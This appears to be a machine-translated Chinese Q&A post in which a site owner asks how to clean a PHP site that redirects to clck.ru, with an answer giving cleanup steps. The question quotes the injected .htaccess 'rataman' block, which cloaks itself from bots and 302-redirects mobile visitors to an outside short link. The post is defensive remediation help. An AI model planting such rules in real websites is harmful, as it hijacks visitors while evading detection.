PHP网站上的恶意软件,指的是clck.ru
我有一个网站,根据Sucuri SiteCheck显然包含恶意软件。它引用了clck.ru的一些链接。
查看代码时未提及clck.ru或类似内容。
我运行maldetect(在操作系统的Ubuntu上),它发现了一些我已删除的文件。
我已更新所有应用程序并重新启动系统。
但Sucuri SiteCheck仍未确认网站是否干净。
我所指的网站是cphdans.dk。任何人都可以帮我解决更多问题吗?
可能是某种SQL注入攻击,所以我应该在MySQL数据库中搜索某些内容(找不到clck.ru)。
更新
使用以下代码破坏了.htaccess文件:
#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,$
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu9$
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|a$
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleW$
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|ameri$
RewriteRule ^(.*)$ http://clck.ru/8sNeJ [L,R=302]
#########!rataman!#########
1 个答案:
答案 0 :(得分:1)
很抱歉听到这个消息。代码可能会通过base64和eval进行模糊处理。这东西很讨厌。它是一个什么样的系统?您能否将代码库与同一软件的干净副本进行比较?就像在服务器上有站点一样,但是在开发或登台服务器上的另一个目录中有一个干净的备份?原因是如果你这样做,你可以看到哪些文件可能已经改变。
我做的两种方法是使用diff和rsync进行CRC校验。首先是一个简单的diff:
diff -Naur /path/to/infected/code/ /path/to/clean/code/
但我发现在干运行模式下使用rsync(选项n) with the CRC option of c`设置更好:
rsync -rvnc /path/to/infected/code/ /path/to/clean/code/
您可能会发现以下部分或全部内容:
- 妥协的配置文件:脚本将尝试将恶意软件添加到PHP脚本的开头或结尾。
- 看起来像他们应该在那里的文件但不是:例如,在WordPress中有一个
hello.php文件。但是,某些恶意软件会创建一个hello1.php文件或一些类似的文件,但不是确切的文件名。 - 不应存在的目录:这通常是真正的有效载荷。该目录将包含大量脚本。
- JavaScript:检查您的JavaScript文件是否存在恶意软件。
同样,您很可能永远不会找到所提及的URL的明文版本,但您很可能会发现不应该存在的垃圾只是通过base64编码/隐藏的恶意软件并通过eval运行。
另外,请检查站点管理员中的用户列表。寻找任何新注册或修改的用户。
编辑根据the Google safe browsing check您的网站是干净的。也就是说,查看Sucuri SiteCheck所说的内容会显示受损的特定页面。这one here。这one here。您能看一下这些页面的代码或CMS内容的任何位,看看是什么?
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?